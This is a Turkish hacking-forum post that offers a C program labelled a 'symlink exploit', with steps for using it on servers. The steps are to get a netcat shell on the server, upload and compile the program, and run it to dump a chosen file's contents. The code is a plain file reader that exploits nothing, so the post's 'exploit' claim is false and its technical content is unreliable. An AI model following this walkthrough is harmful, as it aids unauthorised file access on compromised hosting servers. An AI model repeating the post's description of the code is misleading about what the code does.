L0rxhell.c Taşaklı Exploit File Symlink (1 Viewer)

l0rxhell

Guest
Joined
Jan 27, 2017
Credits
0
Rating - 0%
View hidden content is available for registered users!

Code:
*
 * File:   l0rxhell.c
 * Author: l0rxhell
 * Description: File name editleyin             
 */
 
#include <stdio.h>
 
#define MAXCHAR 1000
int main() {
    FILE *fp;
    char str[MAXCHAR];
    char* filename = "BURAYA ÇEKİLECEK DOSYA";
 
    fp = fopen(filename, "r");
    if (fp == NULL){
        printf("Could not open file %s",filename);
        return 1;
    }
    while (fgets(str, MAXCHAR, fp) != NULL)
        printf("%s", str);
    fclose(fp);
    return 0;
}

NC OLUYORUZ ARDINDAN EXPLOİTİ DÜZENLİYORUZ lorxhell.c diye kaydediyoruz sw ye atıyoruz
Code:
 gcc -pthread l0rxhell.c -o l0rxhell -lcrypt
dizinde direk l0xhell adında derlenmiş bi exploit oluşacak
Code:
./l0rxhell
Die okutuyoruz ve karşımızda dosya içerigi eğer gcc permisson hatası verirse vps sunucusu alıp derleyin çıkan l0rxhell adlı uzantısız exploiti atıp direk çalıştırın
 

Users who are viewing this thread

Top